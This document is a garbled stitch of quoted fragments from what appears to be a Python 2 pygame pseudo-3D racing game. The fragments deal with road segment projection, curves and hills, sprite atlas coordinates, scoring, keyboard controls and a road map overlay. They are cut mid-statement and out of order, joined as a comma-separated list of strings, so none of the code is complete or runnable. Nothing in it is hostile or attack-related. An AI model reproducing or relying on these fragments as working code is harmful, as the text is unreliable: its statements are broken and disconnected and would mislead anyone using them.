self.xc_to_xp(xcl1, self.d,", "/ rad #a *= 10.0 #print a s = 1.0", "xcr1 - x_curve xcr2 = xcr2 - x_curve xcr3 =", "x_pos, x_i, y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj) # render the", "456 self.rdpsd.rect.left = 312 self.disp_add(self.rdpsd) self.scr = pygm.SptLbl(str(int(self.road.score)), c=consts.RED, font_size=16)", "'PALM_TREE': { 'x': 5, 'y': 5, 'w': 215, 'h': 540", "def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi /180.0 * 0.1 #theta_i", "grass, slow down if self.player_x < -self.road_w / 2 or", "+= self.speed_dt_up elif self.player_go == 2: self.speed -= self.speed_dt_dn else:", "< 0: hill.rect.left += hill.rect.width * 2 if hill.rect.left -", "fi.read() segs = utils.json_loads(s) return segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1", "self.c_bg = c_bg self.c_prog = c_prog self.progress(0.0) def progress(self, prog):", "60 }, } FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score':", "yc_to_yp(self, yc, d, zc): if zc == 0.0: #yp =", "str(seg['index']) + '_' + str(i) + '_' + sprt obj", "a = -1.0 elif a > 1.0: a = 1.0", "2 elif k == self.pglc.K_d: return 3 else: return None", "def road_reset_from_file(self, segs_file='sr_roads/sr_road.txt'): segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_reset(init=False, keep_segs=False, segs_file=segs_file)", "def check_player_di(self, e_keys_dn, e_keys_up): if 0 in e_keys_dn: self.player_go =", "(self.position % self.seg_len) zc2 = zw2 - self.camera_z - (self.position", "rad_m = 10.0#50.0# x += rad_m * math.cos(tht) y +=", "'#CCCCCC'}, } FP_ROAD = { 'LENGTH': {'NONE': 0, 'SHORT': 25,", "def xy_to_cntr(self, x, y): return [self.size[0] / 2 + x,", "self.yp_to_ys(yp3, self.h) ys4 = ys3 self.render_polygon(None, 0, ys1, self.w, ys2,", "170 }, 'DEAD_TREE2': { 'x': 1205, 'y': 490, 'w': 150,", "print 'world z', seg['p1']['world']['z'] print 'world y', seg['p1']['world'].get('y', 0.0) #print", "= len(self.segments) if seg_n == 0: return #self.segments[0]['color'] = FP_COLORS['START_Y']", "math import random import time from starfish import pygm from", "self.disp_add(self.tm_once) self.prog = FPSptProgress((4, 100), c_prog=consts.YELLOW) self.prog.rect.top = 70#340 self.prog.rect.left", ": replay this road * RETURN : go to a", "/ 2.0 + w / 2.0 * xp xs =", "1,}, 'coin5': {'imgs': ['img_sprts/i_coin5.png'], 'score': 5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score':", "seg = { 'index': n, 'p1': {'world': {'z': (n +", "percent, 2)) def util_ease_in_out(self, a, b, percent): return a +", "the sprites cache self.rd_sprt_cache = [] # <1> #for i,", "self.rd_seg_add(self.util_ease_out(curve, 0, n/leave), self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total)) def add_curves(self): self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],", "else: return self.segments[seg_n - 1]['p2']['world'].get('y', 0.0) def rd_seg_init_rand(self, n=50): #print", "height/2.0) self.add_road(num, num, num, 0, -height) self.add_road(num, num, num, 0,", "only use the first sprite ! sprt = sprts[0] x_i", "{ 'x': 5, 'y': 495, 'w': 1280, 'h': 480 },", "zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3 self.render_polygon(None, 0,", "self.centrifugal #p_dt = 40 #p_dt = -40 #p_dt = random.randint(-100,", "490, 'w': 150, 'h': 260 }, 'BOULDER1': { 'x': 1205,", "[xsr1, xsr2, (xsr1 + xsl1) / 2.0, (xsr2 + xsl2)", "= self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees1.rect.top = 0", "pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once)", "def check_if_car_out_road(self): # decrease score when go out the road", "rad2 * math.cos(engi * i) xx3 = rad1 * math.cos(engi", "[1, self.size[1] - y, self.size[0] - 2, y]) class FPStraight(pygm.PyGMSprite):", "self.bg_trees2.rect.top = 0 self.bg_trees2.rect.left = self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car = FPSptSprts('img_flatpath/images/sprites.png',", "sprt.get('obj') if not obj: # None or 0 return #rd_w_half", "yc - yw2 #print yw1, yw2 xp1 = self.xc_to_xp(xc1, self.d,", "len(self.segments) if seg_n == 0: return #self.segments[0]['color'] = FP_COLORS['START_Y'] #self.segments[2]['color']", "= 0 self.bg_trees2.rect.left = self.bg_trees1.rect.width self.disp_add(self.bg_trees2) self.car = FPSptSprts('img_flatpath/images/sprites.png', IMG_POS_SPRITES['PLAYER_STRAIGHT'])", "num, height): num = num or ROAD['LENGTH']['SHORT'] height = height", "'sprt_x', sprt_x #print 'car_x', car_x #print 'car_w', car_w #print 'sprt_at',", "self.position - (zw1 - self.camera_z) #zc2 = self.position - (zw2", "self.road.position / self.road.track_len self.prog.progress(prg) spdc = self.road.speed / self.road.speed_max self.spd.progress(spdc)", "70#340 self.spd.rect.left = 602 #self.spd.rotate(180) self.disp_add(self.spd) def rdmap_hide(self): self.rdmap.hide() def", "}, 'BOULDER3': { 'x': 230, 'y': 280, 'w': 320, 'h':", "self.road.seg_len) self.rdmap.rotate(90) def road_reset(self): self.road.rd_reset() self.rdmap_reset() def road_reset_keep_segs(self): self.road.rd_reset(init=False, keep_segs=True)", "segs = self.segments segs_c = [] for seg in segs:", "= 1100 elif x_i == 5: sprt_at = -1100 #print", "n % 2 == 0: #if n % 4 ==", "**kwargs): super(FPSptRoadMap, self).__init__(size) self.segs = segs self.rad = rad #self.fill(consts.WHITE)", "self.yp_to_ys(yp1, self.h) ys2 = ys1 yp3 = self.yc_to_yp(yc2, self.d, zc2)", "p_dt for sky in self.bg_sky: #print sky sky.rect.left += int(self.sky_speed", "'BUSH1': { 'x': 5, 'y': 1097, 'w': 240, 'h': 155", "b_curve = self.player_seg.get('curve', 0.0) #b_percent = 0.5 b_percent = self.util_curve_percent_remaining(self.position,", "import math import random import time from starfish import pygm", "self.rd_sprt_cache.append(obj) # render the sprites with right order for obj", "self.rd_seg_render() def init_rd_segs_rand_1(self): #self.rd_seg_init(self.seg_n) #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 #self.rd_seg_init(random.randint(30, 100)) self.rd_seg_init(random.randint(1, 10))", "/ 2 ##self.disp_add(self.car) # car disp add after road #self.road", "#yp = 2 ** 64 yp = yc else: yp", "200, 'h': 315 }, 'BILLBOARD01': { 'x': 625, 'y': 375,", "= self.position - (zw1 - self.camera_z) #zc2 = self.position -", "seg_n = len(self.segments) segbi = self.get_seg_base_i() #print 'segbi', segbi, '", "self.car.rect.left = (640 - self.car.rect.width) / 2 ##self.disp_add(self.car) # car", "= -self.road_w / 2 - self.player_x xc3 = self.road_w /", "xp = xc * (d / zc) return xp def", "here self.rd_sprt_objs[obj_k] = obj # for reset to delete all", "= self.camera_h #print '=' * 80 #print 'self.position', self.position for", "math.pi / 2.0 / 60#10#20 rad = self.road_w * 4#2", "'rumble': FP_COLOR_WHITE}, 'FINISH': {'road': FP_COLOR_BLACK, 'grass': FP_COLOR_BLACK, 'rumble': FP_COLOR_BLACK}, 'START_Y':", "'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane': '#CCCCCC'}, 'DARK':", "self.pglc.K_DOWN: return 2 elif k == self.pglc.K_LEFT: return 3 else:", "curve, 'color': c, 'sprites': [], 'looped': 0, } self.segments.append(seg) self.track_len", "hide / show road map self.rdmap_hide() elif k == self.pglc.K_RETURN:", "ys1, self.w, ys2, self.w, ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None, xs1,", "- self.player_x xc3 = (rad - xx3) - self.player_x xc4", "self.rdmap.hide() def rdmap_reset(self): self.rdmap.clear() self.rdmap.draw_segs(self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rotate(90) def road_reset(self): self.road.rd_reset()", "self.seg_len * math.tan(theta2) xs1 += dx1 xs2 += dx1 xs3", "self.rd_seg_init_rand(segnrand) # for segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for", "self.road_w = 2400#2000#600.0#200.0#1000.0#200# self.camera_h = 500.0#1000.0# self.speed_max = 300.0#180.0#200.0#100.0 self.lane_w", "self.check_if_car_out_road() self.check_score() self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn, e_keys_up): if 0", "= rl * random.random() * 6.0 yw = 0.0 self.add_road(enter,", "trees.rect.width * 2 class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size, segs, rad,", "self.yc_to_yp(yc, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h) ys4 = ys3", "range(n): rl = random.choice([1, -1]) enter = random.randint(10, 40) hold", "seg['color']['rumble']) self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4,", "num = num or ROAD['LENGTH']['SHORT'] height = height or ROAD['HILL']['LOW']", "= w / 2.0 + w / 2.0 * xp", "w / 2.0 + w / 2.0 * xp xs", "= self.xp_to_xs(xpl3, self.w) xpl4 = self.xc_to_xp(xcl4, self.d, zc2) xsl4 =", "o class FPSptRoadB(sptdraw.SptDrawBase): def __init__(self, size, cfg, *args, **kwargs): super(FPSptRoadB,", "* b_percent) x_curve = 0 # <1> #for i, seg", "while (result >= mx): result -= mx while (result <", "xsr3, ys3, seg['color']['rumble']) def rd_seg_render__2_o(self): \"\"\"curve test 1\"\"\" #theta_i =", "return tht_d def get_segs_pnts(self, segs, rad): pnts = [] x,", "'h': 56 }, 'PLAYER_UPHILL_LEFT': { 'x': 1383, 'y': 961, 'w':", "self.seg_len)) #i = int(math.floor(pos / self.seg_len)) #i = int(math.ceil(pos /", "'x': 1205, 'y': 1018, 'w': 80, 'h': 56 }, 'PLAYER_UPHILL_LEFT':", "- (b_curve * b_percent) x_curve = 0 #print 'b_curve', b_curve", "fps_clock, *args, **kwargs): pass class GMFlatpath(pygm.PyGMGame): def __init__(self, title, winw,", "961, 'w': 80, 'h': 45 }, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295,", "p in pnts] c = utils.clr_from_str(FP_COLOR_BLUE) #self.pygm.draw.polygon(self.surf, c, cpnts) self.pygm.draw.lines(self.surf,", "#zc1 = self.position - (zw1 - self.camera_z) #zc2 = self.position", "= SptTmpx((200, 200)) self.sn1.rect.top = 100 self.sn1.rect.left = 100 self.disp_add(self.sn1)", "}, 'PLAYER_UPHILL_STRAIGHT': { 'x': 1295, 'y': 1018, 'w': 80, 'h':", "+ '.txt' segs_file = utils.dir_abs(segs_file, __file__) self.road.rd_seg_json_save(segs_file) def handle_event(self, events,", "zc2 = zw2 - self.camera_z - self.position #zc1 = self.position", "'h': 170 }, 'BILLBOARD06': { 'x': 488, 'y': 555, 'w':", "# for curve xc1 = xc1 - x_curve xc2 =", "{'imgs': ['img_sprts/i_health.png'], 'score': 10,}, 'heart': {'imgs': ['img_sprts/i_heart.png'], 'score': 50,}, 'pot1':", "#self.disp_add(self.bk) self.scn1 = FPSceneA() self.disp_add(self.scn1) road_file = kwargs.get('road_file') if road_file:", "self.rd_sprt_objs[obj_k] = obj # for reset to delete all #", "check score self.last_seg_i = 0 self.game_over = True self.game_score =", "-= 1#self.sky_speed if sky.rect.left + sky.rect.width < 0: sky.rect.left +=", "font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog =", "0.2#0.1# self.tree_speed = 0.3#0.15# def rd_reset(self, init=False, keep_segs=False, segs_file=None): #if", "self.speed -= self.speed_dt_dn else: self.speed -= self.speed_dt_na # if on", "= len(self.segments) if n is None: #n = seg_n /", "zw2 = (i+2)*self.seg_len zc1 = zw1 - self.camera_z - (self.position", "y = self.size[1] * prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, # [1,", "p < 0.7: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['EASY']) else:", "self.speed * p_curve * self.centrifugal #p_dt = 40 #p_dt =", "'curve', seg.get('curve', 0.0) print 'world z', seg['p1']['world']['z'] print 'world y',", "'world y', self.player_seg['p1']['world'].get('y', 0.0) # clear the sprites cache self.rd_sprt_cache", "self.zc = 0.0 ## self.xp = 0.0 self.yp = 0.0", "0 def update_world(self): if self.player_go == 1: self.speed += self.speed_dt_up", "i) xx2 = rad2 * math.cos(engi * i) xx3 =", "total): return (n % total) / total def add_road(self, enter,", "zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len else: # <1> zw1", "curve = rl * random.random() * 6.0 yw = 0.0", "-self.road_w / 2 - self.player_x xcl1 = xc1 - self.lane_w", "random.randint(2, 10) if self.position > self.track_len: self.position -= self.track_len #'''", "[x4, y4], [x1, y1]] #pnts = [[x1, y1-d], [x2, y2-d],", "self.e_keys_up = e_keys_up self.e_keys_dn = e_keys_dn return r_events def refresh__1(self,", "[] self.rd_sprt_objs = {} self.rd_sprt_cache = [] # for sprites", "= [] for event in events: #print event if event.type", "= 0 self.game_over = False self.game_score = 0.0 self.tm_start =", "0, height/2.0) self.add_road(num, num, num, 0, -height) self.add_road(num, num, num,", "< 0.35: self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], rl * FP_ROAD['CURVE']['MEDIUM']) elif p", "self.check_score() self.check_tm() self.update_bg() def check_player_di(self, e_keys_dn, e_keys_up): if 0 in", "self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left =", "self.segments else: segs = self.segments[:-self.seg_draw_n] return segs # #### geometry", "segbi = self.get_seg_base_i() print 'segbi', segbi self.player_seg = self.segments[segbi] b_curve", "1280, 'h': 480 }, 'TREES': { 'x': 5, 'y': 985,", "str(i) + '_' + sprt obj = info.get('obj') ''' #", "0.0 #self.tm_end = 0.0 def update_bg(self): # always move the", "0.0 else: rad_m = 0.5#1.0#0.1# else: if cv_s: cv_l +=", "in self.rd_sprt_objs.items(): #print k, sprt self.disp_del(sprt) del self.rd_sprt_objs[k] def util_limit(self,", "move the cloud for sky in self.bg_sky: sky.rect.left -= 1#self.sky_speed", "self.w, ys4, 0, ys3, seg['color']['grass']) self.render_polygon(None, xs1, ys1, xs2, ys2,", "not keep_segs: if not init: self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file is", "'h': 360 }, 'DEAD_TREE1': { 'x': 5, 'y': 555, 'w':", "to up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] - y, self.size[0] -", "'y': 1097, 'w': 232, 'h': 152 }, 'BILLBOARD03': { 'x':", "self.pglc.K_n: return 2 elif k == self.pglc.K_d: return 3 else:", "self.h) ys4 = ys3 self.render_polygon(None, 0, ys1, self.w, ys2, self.w,", "*args, **kwargs): super(SptTmpx, self).__init__(size) self.draw_on() def draw_on(self, *args, **kwargs): self.fill(consts.GREEN)", "-100,}, #'bear': {'imgs': ['img_sprts/bear2.png'], 'score': -80,}, #'dinof': {'imgs': ['img_sprts/dinof2.png'], 'score':", "range(n): p = random.random() #print p rl = random.choice([1, -1])", "+= dx1 xs3 += dx2 #+ dx1 xs4 += dx2", "return obj = sprt.get('obj') if not obj: # None or", "= 100 self.sn1.rect.left = 100 self.disp_add(self.sn1) ''' ''' self.lb1 =", "1205, 'y': 760, 'w': 168, 'h': 248 }, 'BUSH1': {", "= x_i obj.rect.top = 116 - y + 240 -", "'#72D7EE', 'TREE': '#005108', 'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10',", "= start_y + (int(yw) * self.seg_len) total = enter +", "= rad1 * math.cos(engi * i) xx2 = rad2 *", "size, c=[0, 81, 8, 0], h=30, *args, **kwargs): super(FPSptFog, self).__init__(size)", "self.d, zc1) xsr1 = self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d,", "}, 'START': {'road': FP_COLOR_WHITE, 'grass': FP_COLOR_WHITE, 'rumble': FP_COLOR_WHITE}, 'FINISH': {'road':", "0 self.bg_trees1.rect.left = 0 self.disp_add(self.bg_trees1) self.bg_trees2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['TREES']) self.bg_trees2.rect.top", "[x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]] #pnts =", "self.disp_add(self.scr) self.tm_once = pygm.SptLbl(str(int(self.road.tm_last_once)), c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left", "return # NOTE: here we should use the segment just", "leave, 0.0, 0.0) def rd_seg_init_rand_curve(self, n=5): #print 'rd_seg_init_rand', n for", "obj: self.rd_sprt_cache.append(obj) # render the sprites with right order for", "- x_curve xcr2 = xcr2 - x_curve xcr3 = xcr3", "(i + 1)) xx4 = rad2 * math.cos(engi * (i", "= 0 cv_l = 0.0 pnts.append([x, y]) for seg in", "increment, mx): # with looping result = start + increment", "n, total): return (n % total) / total def add_road(self,", "ys4 = ys3 ''' #if 1: #if i < self.seg_draw_n", "== 1: self.player_x += 19 if self.player_x > 1000: self.player_di", "= (rad - xx4) - self.player_x xp1 = self.xc_to_xp(xc1, self.d,", "= utils.clr_from_str(FP_COLORS['DARK']['road']) self.clr_dark_grass = utils.clr_from_str(FP_COLORS['DARK']['grass']) self.rd_reset(init=True) self.add_fog() def prms_reset(self, keep_segs=False):", "k == self.pglc.K_UP: return 0 elif k == self.pglc.K_RIGHT: return", "self.rad) def xy_to_cntr(self, x, y): return [self.size[0] / 2 +", "* math.tan(theta1) dx2 = self.seg_len * math.tan(theta2) xs1 += dx1", "height = height or ROAD['HILL']['LOW'] self.add_road(num, num, num, 0, height/2.0)", "self.player_x xcl1 = xc1 - self.lane_w xcl2 = xc2 +", "= 1.0#0.1# else: a = float(curve) / rad a *=", "'clown': {'imgs': ['img_sprts/clown1.png'], 'score': -100,}, } class SptTmpx(sptdraw.SptDrawBase): def __init__(self,", "large if scale > 500: #print 'scale <1>', scale pass", "zw2 = seg['p2']['world']['z'] ''' zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len", "FPSptRoadMap((480, 480), self.road.rd_get_segs(whole=True), self.road.seg_len) self.rdmap.rect.top = 0 self.rdmap.rect.left = 80", "self.player_x xc3 = self.road_w / 2 - self.player_x xc4 =", "def rd_sprts_init_rand(self, n=None): seg_n = len(self.segments) if n is None:", "# from down to up self.pygm.draw.rect(self.surf, self.c_prog, [1, self.size[1] -", "self.fog = FPSptFog(self.size) self.fog.rect.top = 240 self.fog.rect.left = 0 self.disp_add(self.fog)", "41 }, 'PLAYER_STRAIGHT': { 'x': 1085, 'y': 480, 'w': 80,", "= 0.0 self.sky_speed = 0.1#0.05# self.hill_speed = 0.2#0.1# self.tree_speed =", "segs def rd_seg_render__1_o(self): \"\"\"straight\"\"\" xc1 = self.road_w / 2 -", "r_events.append(event) else: r_events.append(event) return r_events def refresh(self, fps_clock, *args, **kwargs):", "}, } FP_ROAD_SPRTS = { 'chest': {'imgs': ['img_sprts/i_chest1.png'], 'score': 100,},", "bg_trees=[self.bg_trees1, self.bg_trees2]) self.road.rect.top = 240 self.road.rect.left = 0 self.disp_add(self.road) self.disp_add(self.car)", "1.0 if a < 0.0: s = -1.0 if a", "580 elif x_i == 3: sprt_at = -580 elif x_i", "x_i, y_sprt, scale_sprt) if obj: self.rd_sprt_cache.append(obj) # render the sprites", "for reset to delete all # NOTE: only show one", "'self.position', self.position # <2> seg_n = len(self.segments) segbi = self.get_seg_base_i()", "prg = self.road.position / self.road.track_len self.prog.progress(prg) spdc = self.road.speed /", "xc4 + self.lane_w xcr1 = xcr1 - x_curve xcr2 =", "scale pass x_i_saved = info.get('x_i') #if not x_i_saved: # info['x_i']", "[] self.e_keys_dn = [] self.camera_x = 0.0 self.camera_y = 0.0", "xsr1 = self.xp_to_xs(xpr1, self.w) xpr2 = self.xc_to_xp(xcr2, self.d, zc1) xsr2", "300.0#180.0#200.0#100.0 self.lane_w = 60 self.seg_n = 300#200 #self.seg_draw_n = 200#150", "{ 'x': 1365, 'y': 644, 'w': 100, 'h': 78 },", "render out here self.rd_sprt_objs[obj_k] = obj # for reset to", "draw_on(self, *args, **kwargs): #self.fill(self.c) d = 2 n = self.h", "#print si seg = self.segments[si] #''' ''' # for test", "= self.yp_to_ys(yp3, self.h) ys4 = ys3 ''' # for test", "height) self.add_road(num, num, num, 0, 0) self.add_road(num, num, num, 0,", "to a new road TODO: * hill road * more", "map self.rdmap_hide() elif k == self.pglc.K_RETURN: self.road_reset() elif k ==", "elif self.player_go == 2: self.speed -= self.speed_dt_dn else: self.speed -=", "= [] self.e_keys_dn = [] self.camera_x = 0.0 self.camera_y =", "just under the car #sprts = self.player_seg['sprites'] sprts = self.base_seg['sprites']", "else: c = FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg =", "* 10.0 else: curve = rl * random.random() * 6.0", "ys3 ''' #if 1: #if i < self.seg_draw_n / 2:", "return 0 elif k == self.pglc.K_RIGHT: return 1 elif k", "seg['color']['road']) if 1:#i % 2 == 1: xpl1 = self.xc_to_xp(xcl1,", "> 0: trees.rect.left -= trees.rect.width * 2 class FPSptRoadMap(sptdraw.SptDrawBase): def", "* (1 - math.pow(1 - percent, 2)) def util_ease_in_out(self, a,", "= self.road_w / 2 - self.player_x #xc4 = -self.road_w /", "self.player_x < -1000: self.player_di = 1 elif self.player_di == 1:", "531, 'w': 80, 'h': 41 } } FP_COLOR_WHITE = '#FFFFFF'", "} self.segments[j]['sprites'].append(s) def rd_sprts_del_all_objs(self): for k, sprt in self.rd_sprt_objs.items(): #print", "}, 'PLAYER_RIGHT': { 'x': 995, 'y': 531, 'w': 80, 'h':", "# for check score self.last_seg_i = 0 self.game_over = True", "just under the car self.player_di = 0 # 0:^ 1:>", "'rumble': '#555555', 'lane': '#CCCCCC'}, 'DARK': {'road': '#696969', 'grass': '#009A00', 'rumble':", "IMG_POS_BACKGROUND['HILLS']) self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 =", "1383, 'y': 760, 'w': 88, 'h': 55 }, 'CAR02': {", "> self.road_w / 2: self.speed -= 10 if self.speed <", "c, False, cpnts, 3) class FPSptProgress(sptdraw.SptDrawBase): def __init__(self, size, c_bg=consts.BLUE,", "#theta_i = 0.0 #xc1 = self.road_w / 2 - self.player_x", "self.rd_sprts_del_all_objs() self.prms_reset(keep_segs=keep_segs) if segs_file is not None: try: segs =", "enter, hold, leave, curve, yw=0.0): #print enter, hold, leave, curve,", "= height or ROAD['HILL']['LOW'] self.add_road(num, num, num, 0, height/2.0) self.add_road(num,", "sprite ! sprt = sprts[0] x_i = sprt.get('x_i') if x_i", "obj ##self.disp_add(obj) # NOTE: render out here self.rd_sprt_objs[obj_k] = obj", "'h': 540 }, 'BILLBOARD08': { 'x': 230, 'y': 5, 'w':", "rad - self.road_w / 2 yc = self.camera_h print '='", "'#000000' FP_COLOR_YELLOW = '#EEEE00' FP_COLOR_BLUE = '#00EEEE' FP_COLORS = {", "- self.player_x xc2 = -self.road_w / 2 - self.player_x xc3", "= FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky1.rect.top = 0 self.bg_sky1.rect.left = 0 self.disp_add(self.bg_sky1)", "\\ self.player_x > self.road_w / 2: self.speed -= 10 if", "self.get_seg_base_i() #print 'segbi', segbi, ' / ', seg_n self.player_seg =", "trees.rect.left -= trees.rect.width * 2 class FPSptRoadMap(sptdraw.SptDrawBase): def __init__(self, size,", "ys4, xs3, ys3, seg['color']['road']) def rd_seg_render__4_o(self): \"\"\"curve\"\"\" #theta_i = math.pi", "self.xp_to_xs(xp4, self.w) yp1 = self.yc_to_yp(yc1, self.d, zc1) ys1 = self.yp_to_ys(yp1,", "'BOULDER3': { 'x': 230, 'y': 280, 'w': 320, 'h': 220", "def __init__(self, size, segs, rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs", "= 0.0, 0.0 tht = 0.0 rad_m = 4.0#2.0#1.0# pnts.append([x,", "'score': 5,}, 'coin20': {'imgs': ['img_sprts/i_coin20.png'], 'score': 20,}, 'health': {'imgs': ['img_sprts/i_health.png'],", "= theta_i * i theta2 = theta_i * (i +", "= -1.0 def check_score(self): # make sure we check score", "self.disp_add(obj) ''' # <2> if obj: self.disp_del(obj) # NOTE: objs", "'h': 41 }, 'PLAYER_RIGHT': { 'x': 995, 'y': 531, 'w':", "'x': 1205, 'y': 5, 'w': 282, 'h': 295 }, 'BILLBOARD04':", "self.road_w / 2 - self.player_x - curve_d * i #xc2", "self.bg_sky = kwargs.get('bg_sky') self.bg_hills = kwargs.get('bg_hills') self.bg_trees = kwargs.get('bg_trees') self.clr_dark_road", "len(self.segments) #print n if n % 2 == 0: #if", "'FOG': '#005108', 'LIGHT': {'road': '#6B6B6B', 'grass': '#10AA10', 'rumble': '#555555', 'lane':", "ys1 yp3 = self.yc_to_yp(yc, self.d, zc2) ys3 = self.yp_to_ys(yp3, self.h)", "(car_x - w_half) < sprt_at < (car_x + w_half): self.score", "= xc3 - self.lane_w xcl4 = xc4 + self.lane_w xcr1", "NOTE: we now only use the first sprite ! sprt", "'>>> ', events if not self.flag_check_event: return events else: return", "seg['p2']['world'].get('y', 0.0) yc1 = yc - yw1 yc2 = yc", "'h': 57 }, 'CAR01': { 'x': 1205, 'y': 1018, 'w':", "else: seg_c[k] = [] for spr in seg['sprites']: spr_n =", "segs: curve = seg.get('curve', 0.0) if curve == 0.0: rad_m", "self.speed_max self.position += self.speed if self.position > self.track_len: self.position -=", "= math.asin(a) # TODO: tht += tht_d rad_m = 10.0#50.0#", "#ca = 255 / n * (n - i) ca", "> 0: hill.rect.left -= hill.rect.width * 2 for trees in", "winw, winh) bk_im = utils.dir_abs('starfish/data/img_bk_1.jpg', __file__) #self.bk = pygm.SptImg('data/img_bk_1.jpg') self.bk", "'w') as fo: fo.write(s) def rd_seg_json_load(self, f): with open(f, 'r')", "self.player_x xc4 = -self.road_w / 2 - self.player_x xcl1 =", "= seg_n / random.randint(10, 30) for i in range(n): j", "* 60 pass def rd_sprts_render(self, seg, x_pos, x_i, y, scale):", "rd_w_half - self.lane_w] sprt_x = obj.rect.left sprt_w = obj.rect.width car_x", "#print event if event.type == self.pglc.KEYUP: k = event.key if", "self.rdmap.rect.top = 0 self.rdmap.rect.left = 80 self.rdmap.rotate(90) self.disp_add(self.rdmap) self.rdpsd =", "elif 3 in e_keys_dn: self.player_di = 3 if 0 in", "yw=0.0): #print '+', curve, yw n = len(self.segments) #print n", "i theta2 = theta_i * (i + 1) dx1 =", "seg = self.segments[si] #''' ''' # for test if i", "= '#000000' FP_COLOR_YELLOW = '#EEEE00' FP_COLOR_BLUE = '#00EEEE' FP_COLORS =", "xc2 = -self.road_w / 2 - self.player_x xc3 = self.road_w", "ROAD['LENGTH']['SHORT'] height = height or ROAD['HILL']['LOW'] self.add_road(num, num, num, 0,", "{ 'x': 1205, 'y': 5, 'w': 282, 'h': 295 },", "return #if len(pnts) > 0: # pnts.append(pnts[0]) cpnts = [self.xy_to_cntr(p[0],", "if i < 10: print '>>> ', i print 'curve',", "seg_n self.player_seg = self.segments[segbi] self.base_seg = self.segments[(segbi + 2) %", "prog self.fill(self.c_bg) #self.pygm.draw.rect(self.surf, consts.GREEN, # [1, 0, self.size[0] - 2,", "= self.speed_max self.position += self.speed if self.position > self.track_len: self.position", "rad, *args, **kwargs): super(FPSptRoadMap, self).__init__(size) self.segs = segs self.rad =", "# None or 0 return obj = sprt.get('obj') if not", "= self.get_segs_pnts(segs, rad) #print pnts if len(pnts) <= 1: return", "< 0.0: s = -1.0 if a < -1.0: a", "self.d, zc2) xsr4 = self.xp_to_xs(xpr4, self.w) self.render_polygon(None, xsr1, ys1, xsr2,", "(car_x + car_w / 2): if (car_x - w_half) <", "segment draw #self.rd_seg_init(self.seg_draw_n) #self.rd_seg_init(100)#20#500#2#10#4#1#100#200 self.rd_seg_init(10) # for a3c train self.rd_start_seg_init()", "self.disp_add(self.bg_sky1) self.bg_sky2 = FPSptBg('img_flatpath/images/background.png', IMG_POS_BACKGROUND['SKY']) self.bg_sky2.rect.top = 0 self.bg_sky2.rect.left =", "xsl2, ys2, xsl4, ys4, xs4, ys4, seg['color']['rumble']) xpr1 = self.xc_to_xp(xcr1,", "test if i < 10: print '>>> ', i print", "None self.base_seg = None # the segment just under the", "xs2 += dx1 xs3 += dx2 #+ dx1 xs4 +=", "= x_rnd * seg_scale x_pos = [xsr1, xsr2, (xsr1 +", "self.position ''' # for curve xc1 = xc1 - x_curve", "xx4 = rad2 * math.cos(engi * (i + 1)) xc1", "NOTE: here we should use the segment just under the", "zw1 = (i+1)*self.seg_len zw2 = (i+2)*self.seg_len zc1 = zw1 -", "= 0.5 b_percent = self.util_curve_percent_remaining(self.position, self.seg_len) dx_curve = - (b_curve", "c_prog self.progress(0.0) def progress(self, prog): y = self.size[1] * prog", "{} for sk, sv in spr.items(): if sk not in", "x, self.size[1] / 2 - y] def cv_to_engl(self, 